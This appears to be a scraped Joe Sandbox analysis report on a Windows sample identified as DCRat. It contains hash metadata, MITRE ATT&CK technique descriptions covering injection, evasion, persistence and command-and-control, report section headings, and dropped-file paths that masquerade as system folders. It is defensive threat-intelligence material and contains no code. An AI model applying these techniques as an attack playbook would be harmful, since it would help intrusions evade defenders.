Source File: 0000002A.00000002.1941263453.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ffd9bab0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f514fd0fda588570f1f8195387d139da7efafc3ecd21a753ee8e8838bb3044
Instruction ID: bc094645034c07e1fe653470b6c53900ffe4579e7c3a84ade140dd3ed1a04bec
Opcode Fuzzy Hash: b4f514fd0fda588570f1f8195387d139da7efafc3ecd21a753ee8e8838bb3044
Instruction Fuzzy Hash: A4D0C95284F3C54FD70352B51C391807F606E1741078E41EBC4D4DF2B3D48D19498322

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report k1iZHyRK6K.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows Multimedia Platform\e589e10572e94b

C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe

C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe:Zone.Identifier

C:\Program Files (x86)\Windows Portable Devices\e589e10572e94b

C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe

C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe:Zone.Identifier

C:\Program Files\Adobe\Acrobat DC\Resource\Font\e589e10572e94b

C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe

C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe:Zone.Identifier

C:\Program Files\Microsoft\e589e10572e94b

Windows Analysis Report
k1iZHyRK6K.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre